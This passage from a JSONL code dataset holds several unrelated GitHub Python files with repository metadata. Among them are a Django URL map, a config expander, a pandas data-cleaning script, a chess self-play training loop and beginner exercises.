signal.SIGTERM, signal.SIGINT)\n # add signal handler to loop\n for s in signals:\n self.eventloop.add_signal_handler(s, functools.partial(asyncio.ensure_future,\n self._signal_handler(s)))\n # try-except statement\n try:\n self.eventloop.run_until_complete(self._initialize())\n self.eventloop.run_until_complete(self._dispatch())\n except asyncio.CancelledError:\n pass\n","repo_name":"rsaleev/integration","sub_path":"api/events/exit.py","file_name":"exit.py","file_ext":"py","file_size_in_byte":18036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39515371865","text":"import os\nimport re\n\nfrom dodo_commands.framework.command_error import CommandError\nfrom dodo_commands.framework.config_key import Key\nfrom dodo_commands.framework.util import EnvironMemo, xpath_to_string\n\n\nclass DictKey:\n def __init__(self, the_dict, the_key, xpath):\n self.dict = the_dict\n self.key = the_key\n self.xpath = xpath\n\n def __repr__(self): # noqa\n return \"DK[%s]\" % self.key\n\n def warning_msg_not_expanded(self):\n return \"Unexpanded key {key} at location {xpath}\".format(\n key=self.key, xpath=xpath_to_string(self.xpath)\n )\n\n def create_dict_val(self, expanded_key): # noqa\n if expanded_key != self.key:\n self.dict[expanded_key] = self.dict[self.key]\n del self.dict[self.key]\n return DictVal(self.dict, expanded_key, self.xpath)\n\n\nclass DictVal:\n def __init__(self, the_dict, the_key, xpath):\n self.dict = the_dict\n self.key = the_key\n self.xpath = xpath\n\n def get_value(self):\n return self.dict[self.key]\n\n def replace_value(self, new_value):\n self.dict[self.key] = new_value\n\n def warning_msg_not_expanded(self):\n return \"Unexpanded value {val} at location {xpath}\".format(\n val=self.get_value(), xpath=xpath_to_string(self.xpath)\n )\n\n def __repr__(self): # noqa\n return \"DV[%s]\" % self.key\n\n\nclass ListVal:\n def __init__(self, the_list, the_idx, xpath):\n self.idx = the_idx\n self.list = the_list\n self.xpath = xpath\n\n def get_value(self):\n return self.list[self.idx]\n\n def replace_value(self, new_value):\n self.list[self.idx] = new_value\n\n def warning_msg_not_expanded(self):\n return \"Unexpanded value {val} at location {xpath}\".format(\n val=self.get_value(), xpath=xpath_to_string(self.xpath)\n )\n\n def __repr__(self): # noqa\n return \"L[%s]\" % self.idx\n\n\ndef get_key_expressions(search_string, key_regexp=r\"\\$\\{(/[^\\}]*)\\}\"):\n return [x for x in re.finditer(key_regexp, search_string)]\n\n\nclass ConfigExpander:\n \"\"\"Expand environment variables and references in the config.\"\"\"\n\n def __init__(self, extra_vars=None):\n self.extra_vars = extra_vars or {}\n\n def _expand_str(self, current_str):\n expanded_str = current_str\n key_expressions = get_key_expressions(current_str)\n known_strs = []\n\n while key_expressions:\n changed = False\n for key_expression in reversed(key_expressions):\n xpath_string = key_expression.group(1)\n\n key = Key(self.config, xpath_string)\n if key.exists():\n expanded_str = (\n expanded_str[: key_expression.start()]\n + str(key.get())\n + expanded_str[key_expression.end() :]\n )\n\n if expanded_str not in known_strs:\n known_strs.append(expanded_str)\n changed = True\n\n if not changed:\n return None\n\n current_str = expanded_str\n key_expressions = get_key_expressions(current_str)\n\n with EnvironMemo(self.extra_vars):\n expanded_str = os.path.expandvars(expanded_str)\n\n env_key_expressions = get_key_expressions(expanded_str, r\"\\$\\{([^\\}]*)\\}\")\n return expanded_str if not env_key_expressions else None\n\n def _expand(self, raw_obj):\n if isinstance(raw_obj, str):\n return self._expand_str(raw_obj)\n\n if isinstance(raw_obj, list):\n return [self._expand(x) for x in raw_obj]\n\n if isinstance(raw_obj, dict):\n return {self._expand(k): self._expand(v) for k, v in raw_obj.items()}\n\n return raw_obj\n\n def _schedule_children(self, obj, todo, xpath):\n if isinstance(obj, dict):\n for k in obj:\n todo.append(DictKey(obj, k, xpath + [k]))\n return True\n if isinstance(obj, list):\n for idx in range(len(obj)):\n todo.append(ListVal(obj, idx, xpath + [idx]))\n return True\n\n def run(self, config, callbacks=None): # noqa\n nodes = []\n self.config = config\n self._schedule_children(config, nodes, [])\n\n changed = True\n while len(nodes) and changed:\n changed = False\n new_nodes = list()\n for node in nodes:\n if isinstance(node, DictKey):\n expanded_key = self._expand(node.key)\n if expanded_key is None:\n new_nodes.append(node)\n else:\n changed = True\n new_nodes.append(node.create_dict_val(expanded_key))\n elif isinstance(node, DictVal) or isinstance(node, ListVal):\n value = node.get_value()\n if self._schedule_children(value, new_nodes, node.xpath):\n changed = True\n else:\n expanded_value = self._expand(value)\n if expanded_value is None:\n new_nodes.append(node)\n else:\n changed = True\n\n node.replace_value(expanded_value)\n if xpath_to_string(node.xpath) in (callbacks or {}):\n callbacks[xpath_to_string(node.xpath)](expanded_value)\n else:\n raise CommandError(\"Should not reach here\")\n\n nodes = new_nodes\n\n warnings = [\"Warning: %s\\n\" % node.warning_msg_not_expanded() for node in nodes]\n return warnings\n","repo_name":"mnieber/dodo-commands","sub_path":"dodo_commands/framework/config_expander.py","file_name":"config_expander.py","file_ext":"py","file_size_in_byte":5777,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"26616862281","text":"# -*- coding:utf-8 -*-\nimport os,sys,time\nimport hashlib\nimport chardet\n\nfrom .LOG_sf import logger\n\nprint('Good Luck!')\ndef GetFileHash(fname):\n f = None\n bRet = False\n strSha1 = \"\"\n try:\n f = open( fname, 'rb')\n sha1 = hashlib.sha1()\n strRead = ''\n while True:\n strRead = f.read(8096)\n if not strRead:\n break\n else:\n sha1.update(strRead)\n bRet = True;\n strSha1 = sha1.hexdigest()\n except:\n bRet = False\n logger.exception()\n finally:\n if f:\n f.close()\n return [ bRet, strSha1 ]\ndef GetContent(fname):\n #print(\"Go: ftt = open( fname, 'r', encoding = 'utf-8' )\")\n logger.debug(\"Go: ftt = open( fname, 'r', encoding = 'utf-8' )\")\n logger.debug(\"GetContent ---> %r\", fname)\n try:\n #pdb.set_trace()\n logger.debug('%r',fname)\n ftt = open( fname, 'r', encoding = 'utf-8' )\n fcontent = ftt.readlines()\n except:\n #logger.exception('error msg: Loading file with sysdefault codepage again')\n print('error msg: Loading file with sysdefault codepage again')\n encodett = chardet.detect( open(fname,'rb').read() )['encoding']\n try:\n #pdb.set_trace()\n ftt = open( fname, 'r', encoding = encodett )\n fcontent = ftt.readlines()\n except Exception as e:\n print('error msg: Fail to load file--->%s' % fname)\n #logger.exception('error msg')\n #logger.info( 'Fail to load file--->%s',fname )\n return 0\n finally:\n if ftt:\n ftt.close()\n flineargs = []\n ftti = 1\n for fci in fcontent:\n flineargs.append(( fci, ftti ))\n ftti = ftti + 1 \n return flineargs\n\n \n \n","repo_name":"zhixingheyi666/python_learn","sub_path":"codein/fc/FileFunc.py","file_name":"FileFunc.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8744144596","text":"# Python 101-02 - Example 1\n# Move multiple files to Multiple folder and renames them\n# It takes the name of a pdf file and create a folder base on that name and then move the pdf file to the new folder and then rename the file to ad,pdf\n\nimport os\n\nfor filename in os.listdir(r\"C:\\Users\\Muhammad\\Desktop\\New Jobs Copy\"): # Pay attention to the ending : for a for loop\n if filename.endswith('.pdf'): \n print(filename)\n \n# This is the way we chech for pdf files Otherwise folders and other extenstions would show up. \n# Also pay attention to the ending : for an if statement\n\n# This was a simple test. Now lets create folder for each pdf file using the same name of pdf file\nrootFolder = r\"C:\\Users\\Muhammad\\Desktop\\New Jobs Copy\"\n\nfor filename in os.listdir(rootFolder): # Pay attention to the ending : for a for loop\n if filename.endswith('.pdf'): \n newFolderPath = rootFolder + '\\\\' + os.path.splitext(filename)[0] # We simply remove the file extension to get the path of the new folder! [1] is the .extension\n \n print(newFolderPath)\n\n if not os.path.exists(newFolderPath):\n os.mkdir(newFolderPath)\n\n os.rename(rootFolder + '\\\\' + filename, newFolderPath + '\\\\ad.pdf')\n# End!","repo_name":"sadafproducts/Python101-02","sub_path":"move multiple files.py","file_name":"move multiple files.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34893626444","text":"\r\n# %% Import danych\r\nimport pandas as pd\r\n\r\ndf = pd.read_csv(r'DANE.csv', encoding= 'unicode_escape')\r\n\r\n# %% Pobranie wierszy zawierające puste wartosci\r\n\r\npuste_wartosci = df[df['zgony'].isna()]\r\n\r\npuste_wartosci_zgony_1996_1997 = puste_wartosci.loc[(puste_wartosci['Rok'] == 1996) | (puste_wartosci['Rok'] == 1997)]\r\n\r\n\r\n\r\n# %% Poprawne nazwy województw\r\npoprawne_nazwy = df.loc[(~df['Nazwa'].str.isalpha())]\r\n\r\n# %% Usuniecie wierszy z brakiem danych\r\n\r\ndf_bez_lat_1996_1997 = df.drop(df[(df.Rok == 1996) | (df.Rok == 1997)].index)\r\ndf_bez_lat_1996_1997 = df_bez_lat_1996_1997.reset_index(drop=True)\r\n\r\n\r\n\r\n# %% Uzupelnienie brakujacych wartosci dla roku 1998\r\nfrom sklearn.impute import KNNImputer\r\n\r\nimputer = KNNImputer(n_neighbors=8)\r\ndf_bez_lat_1996_1997_drop_name = df_bez_lat_1996_1997.drop(columns='Nazwa')\r\ndf_bez_lat_1996_1997_uzupelnione_1998 = pd.DataFrame(imputer.fit_transform(\r\n df_bez_lat_1996_1997_drop_name), \r\n columns = df_bez_lat_1996_1997_drop_name.columns)\r\n\r\n\r\ndf_uzupelnione = df_bez_lat_1996_1997.copy()\r\ndf_uzupelnione.loc[df_bez_lat_1996_1997_uzupelnione_1998.index, 'zgony'] = df_bez_lat_1996_1997_uzupelnione_1998\r\n\r\n\r\nprint(df_uzupelnione.isnull().sum())\r\n\r\n\r\n# %% dodanie kolumny z liczba zgonow w przeliczeniu na 100 000 mieszkancow\r\ndf_obliczone = df_uzupelnione.copy()\r\n\r\ndf_obliczone['Zgony_per_100k'] = (df_uzupelnione.zgony / df_uzupelnione.populacja) * 100000\r\ndf_obliczone['Zgony_per_100k'] = df_obliczone['Zgony_per_100k'].round(2)\r\n\r\n\r\n# %% Formatowanie nazw wojewodztw\r\n\r\ndf_poprawa_nazw = df_obliczone.copy()\r\ndf_poprawa_nazw['Nazwa'] = df_poprawa_nazw['Nazwa'].str.title()\r\n\r\ndf_poprawa_nazw['Nazwa'] = df_poprawa_nazw['Nazwa'].str.replace(r\"\\Swie˜Tokrzyskie\\b\", \"Swietokrzyskie\")\r\n\r\n\r\n# %% Zapis pliku wynikowego\r\ndf_poprawa_nazw.to_csv(r'DANEOczyszczone.tsv', sep='\\t')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"michalOruba/dash_app","sub_path":"Czyszczenie_danych.py","file_name":"Czyszczenie_danych.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25903724455","text":"from django.urls import path, re_path\nfrom . import views\nfrom .views import CourseListJson, StudentListJson\nfrom django.conf.urls import url, include\nfrom django.contrib.auth.decorators import login_required\n\napp_name=\"web\"\nhandler404 = \"web.views.404\"\n\nurlpatterns = [\n re_path(r'home/$', views.home, name='home'),\n re_path(r'logout/$', views.logout_method, name='logout'),\n re_path(r'login/$', views.login_method, name='login'),\n re_path(r'register/$', views.register, name='register'),\n re_path(r'course/list$', views.courses_list, name='course_list'),\n re_path(r'course/create/$', views.course_edit, name='course_create'),\n re_path(r'course/edit/$', views.course_edit, name='course_edit'),\n re_path(r'course/edit/(?P\\w+)$', views.course_edit, name='course_edit'),\n re_path(r'course/delete/$', views.course_delete, name='course_delete'),\n re_path(r'course/delete/(?P\\w+)$', views.course_delete, name='course_delete'),\n re_path(r'course/read/(?P\\w+)$', views.course_read, name='course_read'),\n re_path(r'course/read/(?P\\w+)/students/$', views.course_students, name='course_students'),\n re_path(r'course/read/(?P\\w+)/students/invite$', views.course_invite, name='course_invite'),\n re_path(r'course/read/(?P\\w+)/students/(?P\\w+)/ban$', views.course_ban, name='course_ban'),\n re_path(r'course/read/(?P\\w+)/students/(?P\\w+)$', views.studentCourseProfile, name='student_courseprofile'),\n re_path(r'course/api/(?P\\w+)/(?P\\w+)$', views.getStudentResultData, name='student_getdata'),\n re_path(r'course/api/(?P\\w+)/(?P\\w+)/(?P\\w+)$', views.getStudentResultData, name='student_getdata'),\n url(r'^my/datatable/data/stud$', login_required(StudentListJson.as_view()), name='course_student_list_json'),\n re_path(r'course/read/(?P\\w+)/experiences/$', views.course_experience, name='course_experience'),\n re_path(r'course/read/(?P\\w+)/experiences/(?P\\w+)$', views.course_exp_visibility, name='course_exp_visibility'),\n re_path(r'course/read/(?P\\w+)/experiences/(?P\\w+)/test$', views.experience_test, name='experience_test'),\n re_path(r'course/read/(?P\\w+)/experiences/(?P\\w+)/test/edit$', views.experience_test_edit, name='experience_test_edit'),\n re_path(r'course/read/(?P\\w+)/experiences/(?P\\w+)/test/visibility$', views.experience_test_visibility, name='experience_test_visibility'),\n re_path(r'course/read/(?P\\w+)/experiences/(?P\\w+)/test/delete$', views.experience_test_delete, name='experience_test_delete'),\n url(r'^my/datatable/data/$', login_required(CourseListJson.as_view()), name='course_list_json'),\n re_path(r'404/$', views.page404, name='404'),\n re_path(r'user/(?P\\d+)/profile/$', views.profile, name='profile'),\n re_path(r'user/(?P\\d+)/profile/edit$', views.profile_edit, name='profile_edit'),\n re_path(r'user/(?P\\d+)/inbox/(?P\\d+)/$', views.message_view, name='msg_view'),\n re_path(r'user/(?P\\d+)/inbox/message/(?P\\d+)/(?P\\d+)$', views.msg_actions, name='msg_actions'),\n re_path(r'user/(?P\\d+)/inbox/message/direct$', views.msg_direct, name='msg_direct'),\n re_path(r'support/$', views.support, name='support'),\n re_path(r'support/exp$', views.send_experience, name='support_experience'),\n re_path(r'course/read/(?P\\w+)/experiences/video/$', views.experience_video, name=\"video\"),\n re_path(r'course/read/(?P\\w+)/experiences/(?P\\w+)/delete/$', views.delexpcourse, name=\"delexpcourse\"),\n re_path(r'user/(?P\\d+)/experiences/$', views.myexperiences, name=\"myexps\"),\n re_path(r'user/(?P\\d+)/experiences/add$', views.addexperiences, name=\"addexps\"),\n re_path(r'user/(?P\\d+)/experiences/(?P\\d+)/edit$', views.editexperiences, name=\"editexps\"),\n re_path(r'user/(?P\\d+)/experiences/(?P\\d+)/delete$', views.delexperiences, name=\"delexps\"),\n re_path(r'user/(?P\\d+)/expcourse/(?P\\d+)/date$', views.datepicker, name=\"date\"),\n]\n","repo_name":"roloow/umvral","sub_path":"web-service/webumvral/web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43755804475","text":"\"\"\"\nDenoise the input and reconstruct.\n\"\"\"\nfrom showcase_utils import *\nfrom tbase.skeleton import Skeleton\nfrom plotter import show_np_arrays\n\nfs = tf.app.flags\nfs.DEFINE_string('model', 'none', 'which model to use for the prediction, expected format is \"model_name/run_id[ft]\" [none]')\nfs.DEFINE_integer('samples', 3, 'amount of examples to be shown')\n\nFLAGS = fs.FLAGS\n\n\ndef add_random_zeros(batch):\n rng = np.random.RandomState(8004)\n mask = np.zeros(batch.inputs_.shape, dtype=bool)\n batch_size = mask.shape[0]\n noise_amount = 0.3\n nr_joints = len(Skeleton.ALL_JOINTS) - 1 # minus root\n nr_frames = mask.shape[2]\n\n for i in range(batch_size):\n for f in range(nr_frames):\n suppress_joint = rng.binomial(1, noise_amount, nr_joints)\n idxs = np.where(suppress_joint != 0)\n idxs_j = (idxs[0] + 1)*3\n mask[i, idxs_j + 0, f] = True\n mask[i, idxs_j + 1, f] = True\n mask[i, idxs_j + 2, f] = True\n\n batch_noise = batch.copy()\n batch_noise.inputs_[mask] = 0.0\n return batch_noise, mask\n\n\ndef add_gaussian_noise(batch, std=0.5):\n rng = np.random.RandomState(8004)\n noise = rng.randn(*batch.inputs_.shape)*std\n # add the noise to the velocities\n n_coords = len(Skeleton.ALL_JOINTS)*3\n noise[:, n_coords:n_coords+3] = 0.0\n batch.inputs_ = batch.inputs_ + noise\n return batch\n\n\ndef main(argv):\n if len(argv) > 1:\n # we have some unparsed flags\n raise ValueError('unknown flags: {}'.format(' '.join(argv[1:])))\n\n # parse the --model flag\n model_name, run_id, discard_foot_contacts, replace_traj = utils.extract_model_name_and_run(FLAGS.model)\n\n # get the location of the model\n model_path = get_model_path(model_name, run_id)\n\n # get a random validation batch\n normalizer = get_normalizer(model_path)\n rng = np.random.RandomState(4313)\n feeder = get_feeder(normalizer=None, discard_foot_contacts=discard_foot_contacts, batch_size=FLAGS.samples, rng=rng)\n batch = feeder.random_valid_batch(rng)\n\n use_gaussian_noise = True\n if use_gaussian_noise:\n # apply gaussian noise to the original input\n batch_noise = add_gaussian_noise(batch, std=1.0)\n ori = np.copy(batch_noise.inputs_)\n\n # then normalize\n batch_noise.inputs_ = normalizer.normalize(batch_noise.inputs_)\n\n # show_np_arrays(batch_noise.inputs_[0:1], '', [''])\n else:\n # set values to 0 in both original and normalized version so that we can visualize\n batch.inputs_ = normalizer.normalize(batch.inputs_)\n batch_noise, noise_mask = add_random_zeros(batch)\n\n # apply perturbation to the original\n ori = np.copy(normalizer.unnormalize(batch.inputs_))\n ori[noise_mask] = 0.0\n\n # get matrix showing which joints were masked out\n # joints_mask = noise_mask[:, np.array(list(range(1, 22)))*3]\n # ids = [id_ for (_, _, id_, _) in batch.all_entries()]\n # for i in range(joints_mask.shape[0]):\n # m = joints_mask[i]\n # fname = 'zero_denoising_mask_id{}.txt'.format(ids[i])\n # np.savetxt(fname, np.array(m, dtype=np.int64), delimiter=',', fmt='%d')\n\n # get the prediction\n pred = get_prediction_from_model(model_path, test_batch=batch_noise)\n\n # unnormalize the prediction\n pred_un = normalizer.unnormalize(pred)\n targets = batch_noise.targets\n # targets = normalizer.unnormalize(batch_noise.targets)\n\n # Compute joint reconstruction error.\n from tbase.skeleton import to_global_batched\n body_dim = len(Skeleton.ALL_JOINTS) * 3\n traj = targets[:, body_dim:body_dim + 3]\n pred_global = to_global_batched(pred_un, override_trajectory=traj,\n override_root=targets[:, 0:3]) # (N, n_joints, 3, seq_len)\n ori_global = to_global_batched(ori, override_trajectory=traj,\n override_root=targets[:, 0:3])\n targets_global = to_global_batched(targets) # (N, n_joints, 3, seq_len)\n\n # Compute 3D reconstruction error per joint and frame w.r.t to target.\n joint_error = np.linalg.norm(pred_global - targets_global, axis=2)\n joint_error = np.transpose(joint_error, [0, 2, 1]) # (N, seq_len, n_joints)\n print('3d joint error:', np.mean(joint_error), np.std(joint_error))\n\n # Compute initial reconstruction error between noisy and target sample.\n joint_error_init = np.linalg.norm(ori_global - targets_global, axis=2)\n joint_error_init = np.transpose(joint_error_init, [0, 2, 1]) # (N, seq_len, n_joints)\n print('3d joint error init:', np.mean(joint_error_init), np.std(joint_error_init))\n\n base_name = 'gaussian_denoising' if use_gaussian_noise else 'zero_denoising'\n ori_names = ['{}_ori_id{}'.format(base_name, id_) for (_, _, id_, _) in batch.all_entries()]\n pred_names = ['{}_pred_id{}'.format(base_name, id_) for (_, _, id_, _) in batch.all_entries()]\n names = [ori_names, pred_names]\n\n # visualize\n show_motions([ori, pred_un], interp_idxs=np.array([0]*pred_un.shape[0]),\n names=names, draw_cylinders=True)\n\n\nif __name__ == '__main__':\n tf.app.run()\n\n","repo_name":"eth-ait/motion-infilling","sub_path":"infilling/showcase_denoising.py","file_name":"showcase_denoising.py","file_ext":"py","file_size_in_byte":5170,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"40"} +{"seq_id":"9920018770","text":"\"\"\"palindromic primes\nringo shima\n9/5/14\"\"\"\nimport math\nimport sys\nimport question1\nsys.setrecursionlimit (30000)\n\ndef primepal(n,m,x):\n #base case\n if n==m:\n x = str(n)\n y = question1.pal(x) #run q1 module\n if y == \"Palindrome!\": \n return x\n else:\n return x\n \n elif n= 18:\n print('年龄大于等于18')\nelif age >= 10:\n print('年龄大于等于10小于18')\nelse:\n print('年龄小于10')\n\n# 字符串转整数\nmyStr = '1888'\nmyNum = int(myStr)\nprint(myNum)\n\n# for循环\nfor i in myLists:\n print(i)\n\nsum = 0\nfor x in range(101):\n sum = sum + x\nprint(sum)\n\n# while循环\nn = 0\nwhile n < len(myLists):\n print(myLists[n])\n n = n + 1\n\n## 函数\ndef myDef(x):\n if x >= 0:\n return x\n else:\n return -x\n\nprint(myDef(-9))\n\n# 函数参数,默认参数\ndef myDef2 (x, n = 2):\n s = 1\n while n > 0:\n n = n - 1\n s = s * x\n return s\n\nprint(myDef2(10, 3))\n\n# 默认参数必须指向不变对象\ndef myDef3(l = []):\n l.append('end')\n return l\n\nprint(myDef3([1,2,3]))\n\nprint(myDef3())\n\nprint(myDef3()) # 输出两个end,参数已经被改变\n\ndef myDef4(l = None):\n if l is None:\n l = []\n l.append('end')\n return l\n\nprint(myDef4())\nprint(myDef4())\n\n# 数组切片 含:不含\nprint(myLists[0:2])\n# 前两个\nprint(myLists[:2])\n# 后两个\nprint(myLists[-2:])\n# 字符串切片\nprint('abcdefg'[:2])\n\n# 迭代\nfor i, val in enumerate(myTuple):\n print(i,val)\n\n# generator, 保存的不是列表, 是算法\ndef myDef5(max):\n n, a, b = 0, 0, 1\n while n < max:\n yield b\n a, b = b, a + b\n n = n + 1\n return 'done'\n\nfor n in myDef5(6):\n print(n)\n\n# 高阶函数, 可以接受函数为参数\ndef myDef6(a, b, f):\n return f(a) - f(b)\n\nprint(myDef6(-5,6,abs))\n\n# 匿名函数, lambda(关键字) x(函数参数):\nprint(list(filter(lambda x: x % 2 == 1, range(1, 20))))\n\n# 对象\n# __name, __ 开头为私有属性,外部无法访问, 通过内部方法获取或修改\nclass Student(object):\n def __init__(self, name, score):\n self.__name = name\n self.__score = score\n\n def print_score(self):\n print('%s : %s' % (self.__name, self.__score))\n\n def get_name(self):\n return self.__name\n\n def get_score(self):\n return self.__score\n\n def set_name(self, name):\n self.__name = name\n\nxiaoming = Student('xiao ming', 88)\n\nxiaoming.set_name('da ming')\nxiaoming.print_score()\n\n# 读取文件\nwith open('./txt.txt', 'r') as f:\n # print(f.read())\n\n for line in f.readlines():\n print(line.strip())\n\n# 获取系统信息\nimport os\nprint(os.name)\n\nprint('1' * 5)\n\n# 时间\nimport time\nprint(time)","repo_name":"nijun008/demo","sub_path":"python-demo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14673940247","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom model import load_existing_model, NUMBER_OF_POSSIBLE_MOVES\nimport chess\nfrom MoveMapping import map_valid_move\nfrom network import FEN_to_layers\nimport numpy as np\nfrom self_play import SelfPlay\nfrom settings import NUMBER_OF_EPOCHS_PER_GAME, MODEL_NAME, NUMBER_OF_CONSIDERED_POSITIONS, \\\n NUMBER_OF_GAMES_PER_ITERATION, NUMBER_OF_ITERATION_IN_TRAINING, N_MCTS_ITERATION, POLICY_SHAPE_3D, \\\n NUMBER_OF_EPOCHS_PER_ITERATION\nimport sqlite3\nimport datetime\nfrom time import time\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\n\n\ndef create_history_db():\n con = sqlite3.connect('./models/training_history.db')\n cur = con.cursor()\n cur.execute(\"\"\"CREATE TABLE history(training_date text, \n number_of_games INTEGER, \n number_of_MCTS_simulations INTEGER, \n n_of_draws INTEGER,\n n_of_white_wins INTEGER,\n n_of_black_wins INTEGER,\n games_not_ended INTEGER, \n time_of_learning text)\"\"\")\n\n\ndef add_record(n_of_games: int, n_of_MCTS: int, n_of_draws: int, n_of_white_wins: int, n_of_black_wins: int, games_not_ended: int, time_of_learning: str) -> bool:\n try:\n now = datetime.datetime.now()\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n con = sqlite3.connect('./models/training_history.db')\n cur = con.cursor()\n cur.execute(\"\"\"INSERT INTO history VALUES (?, ?, ?, ?, ?, ?, ?, ?)\"\"\",\n (dt_string, n_of_games, n_of_MCTS, n_of_draws, n_of_white_wins, n_of_black_wins, games_not_ended, time_of_learning))\n con.commit()\n con.close()\n return True\n except Exception as e:\n return False\n\n\ndef read_all():\n conn = sqlite3.connect('./models/training_history.db')\n c = conn.cursor()\n c.execute(\"\"\"SELECT rowid,* from history\n \"\"\")\n for el in c.fetchall():\n print(el)\n conn.close()\n\n\ndef plot_results(loss, policy_loss, value_loss, game_number: int=0, n_epochs=20):\n epochs = [i for i in range(1, n_epochs+1)]\n plt.figure()\n plt.plot(epochs, loss, label='Loss')\n plt.plot(epochs, value_loss, label='Value head loss')\n plt.plot(epochs, policy_loss, label='Policy head loss')\n plt.xlabel('Epoch')\n plt.ylabel('Loss')\n plt.title('Self-play game training history')\n plt.legend()\n plt.grid()\n plt.show()\n plt.savefig(f'Loss of game{game_number}')\n\n\ndef train(model_name: str = MODEL_NAME, number_of_games: int = 10, number_of_iterations: int = 10):\n model = load_existing_model(name=model_name)\n self_play = SelfPlay(model=model)\n\n time_start = time()\n black_wins = 0\n white_wins = 0\n draws = 0\n games_not_ended = 0\n for iteration in tqdm(range(number_of_iterations)):\n \"\"\"Initialize number of games data\"\"\"\n position_data_records = list()\n move_probabilities_data_records = list()\n position_evaluation_data_records = list()\n x_general: np.array\n y_general: list = []\n for game_number in range(number_of_games):\n position_data, moveProbabilitiesData, positionEvalData = self_play.playGame()\n \"\"\"Increasing data\"\"\"\n result = positionEvalData[-1]\n if 0.4 <= result:\n white_wins += 1\n elif -0.4 <= result <= 0.4:\n draws += 1\n elif result <= -0.4:\n black_wins += 1\n else:\n games_not_ended += 1\n\n moveProbabilitiesDataConverted = list()\n for i, record in enumerate(moveProbabilitiesData[NUMBER_OF_CONSIDERED_POSITIONS:]):\n moveProbabilities = np.zeros(shape=POLICY_SHAPE_3D)\n for move, val, _, _ in record:\n move, plane_index, col, row = map_valid_move(move, chess.Board(position_data[i+NUMBER_OF_CONSIDERED_POSITIONS]))\n moveProbabilities[plane_index][col][row] = val\n moveProbabilitiesDataConverted.append(moveProbabilities.reshape((NUMBER_OF_POSSIBLE_MOVES, 1)))\n\n \"\"\"Adding records to n-games database\"\"\"\n move_probabilities_data_records.append(moveProbabilitiesDataConverted)\n position_evaluation_data_records.append(position_data_records)\n position_data_records.append(position_data)\n\n data_length = len(position_data)\n posEvalDataTrain = [np.array([evaluation]) for evaluation in positionEvalData[NUMBER_OF_CONSIDERED_POSITIONS:]]\n if game_number == 0:\n x_general = np.array([FEN_to_layers(position_data[NUMBER_OF_CONSIDERED_POSITIONS+i: NUMBER_OF_CONSIDERED_POSITIONS+i+NUMBER_OF_CONSIDERED_POSITIONS]) for i in range(data_length - NUMBER_OF_CONSIDERED_POSITIONS)])\n y_general = [np.array(moveProbabilitiesDataConverted), np.array(posEvalDataTrain)]\n else:\n x_new_game = np.array([FEN_to_layers(position_data[NUMBER_OF_CONSIDERED_POSITIONS+i: NUMBER_OF_CONSIDERED_POSITIONS+i+NUMBER_OF_CONSIDERED_POSITIONS]) for i in range(data_length - NUMBER_OF_CONSIDERED_POSITIONS)]) # -1 is last position where is no available moves\n x_last = x_general\n y_last = y_general\n x_general = np.append(x_last, x_new_game, axis=0)\n y_general = [np.append(y_last[0], np.array(moveProbabilitiesDataConverted), axis=0), np.append(y_last[1], np.array(posEvalDataTrain), axis=0)]\n\n print(f\"Training process, game: {game_number+1}\")\n # training_history = model.fit(x_train, y_train, epochs=NUMBER_OF_EPOCHS_PER_GAME)\n \"\"\"Plotting history of training.\"\"\"\n # data = training_history.history\n # loss = data['loss']\n # policy_loss = data['policy_head_loss']\n # value_loss = data['value_head_loss']\n # plot_results(loss, policy_loss, value_loss, game_number, NUMBER_OF_EPOCHS_PER_GAME)\n print(f\"Saving model: iteration: {iteration + 1} - game: {game_number + 1}\")\n training_history = model.fit(x_general, y_general, epochs=NUMBER_OF_EPOCHS_PER_ITERATION)\n data = training_history.history\n loss = data['loss']\n policy_loss = data['policy_head_loss']\n value_loss = data['value_head_loss']\n # plot_results(loss, policy_loss, value_loss, number_of_games, NUMBER_OF_EPOCHS_PER_GAME)\n model.save('./models/' + model_name + '.keras')\n time_end = time()\n time_of_training = time_end - time_start\n save_history_result = add_record(NUMBER_OF_GAMES_PER_ITERATION * NUMBER_OF_ITERATION_IN_TRAINING, N_MCTS_ITERATION,\n draws, white_wins, black_wins, games_not_ended, str(time_of_training))\n if save_history_result:\n print(\"Data of training added successfully!\")\n else:\n print(\"Data of training didn't append successfully!!!\")\n\n print(\"Training has ended\")\n print(f\"Black wins: {black_wins}\")\n print(f\"White wins: {white_wins}\")\n print(f\"Draws: {draws}\")\n print(f\"Without result:{games_not_ended}\")\n print(f\"Trainging last for: {time_of_training} seconds.\")\n\n\nif __name__ == \"__main__\":\n train(model_name='model_12_res', number_of_iterations=NUMBER_OF_ITERATION_IN_TRAINING, number_of_games=NUMBER_OF_GAMES_PER_ITERATION)\n read_all()","repo_name":"GacinhoV33/Engineer_Thesis_Chess_Engine_With_Deep_Reinforcement_Learning","sub_path":"MyEngine/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"10705983030","text":"# inicjalizacja wartości globalnej w skrypcie\n\nglobalID = 0\nclass Player:\n def __init__(self, name, lastname, repr, weight, height):\n self.name = name\n self.lastname = lastname\n self.repr = repr\n self.weight = weight\n self.height = height\n global globalID #modyfikacja wartości globalnej w skrypcie\n globalID += 1 # global -> wskażnik globalny niezwiązany z klasą 